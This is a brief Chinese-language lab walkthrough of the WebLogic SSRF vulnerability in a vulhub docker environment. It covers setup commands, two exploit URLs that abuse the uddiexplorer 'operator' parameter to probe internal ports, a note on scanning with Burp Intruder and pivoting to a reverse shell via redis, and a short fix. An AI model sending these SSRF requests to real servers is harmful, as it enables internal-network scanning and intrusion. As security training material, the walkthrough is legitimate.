参考资料:https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf
docker空间管理
| du -h docker system prune -a 删除镜像 docker system df 查看磁盘使用情况 docker-compose down -v 删除正在用的实例
|
ssrf
| cd /usr/share/vulhub-master/weblogic/ssrf docker-compose build docker-compose up -d pkill rinetd rinetd -c /etc/rinetd.conf --- docker-compose down -v
|
ssrf是服务端请求伪造,意思是服务器接受我们的请求后,然后向内网发起扫描等有害操作。该漏洞出现的原因是服务器需要向内网其他机器获取资源,在请求的过程中,参数可被攻击方修改。
下图是weblogic典型的界面。下面我们看看怎么利用它。
访问以下地址:
| http://18.189.18.237:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
http://18.189.18.237:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7002
|
用burp intruder可以看到7001页面显示的长度,和其他端口不同,说明7001端口开放。
如果内网有其他web漏洞可以反弹shell,例如redis…也可以通过上面的operator=http://127.0.0.1:7002
参数反弹shell
防御方法
过滤参数,禁止参数访问内网IP,例如上文所说的operator参数。